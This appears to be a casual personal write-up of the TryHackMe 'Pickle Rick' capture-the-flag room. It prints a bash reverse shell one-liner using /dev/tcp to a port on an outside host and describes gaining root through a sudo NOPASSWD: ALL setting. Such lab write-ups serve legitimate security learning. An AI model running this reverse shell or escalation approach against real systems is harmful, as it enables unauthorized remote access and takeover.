Joe-Degs/ctf-me/TryHackMe/Pickle_Rick_COMPLETED/README.md

 Hmm looks like there is bash on the server, lemme try a classic bash reverse shell trick and see what happens :D.
 `/bin/bash -c "bash -i >& /dev/tcp/$IP/9999 0>&1"`
 I got a dumb reverse shell from the web server.
 I am trying to get a stable but i only know how to do that i python and the server doesn't run python soo i'll just keep looking.

+- Im going to look for setuid, suid, guid executables and look for how i can use them to gain root control of the shell.
+Okay so i did something stupid again.
+LOL! instead of running `sudo -l` like i always do after entering machines, i decided not to because it has been giving me negative results from all my previous games.
+But little did i know that the current user has a `(ALL) NOPASSWD: ALL` acesss, and i was there stressing myself.

+- So thats that.
+I pwned the machine successfully, learnt lots of things, cried lots of tears and have some goodies in my goodies bag to take away LOL!

+Lamest outro EVER! (themeihide)!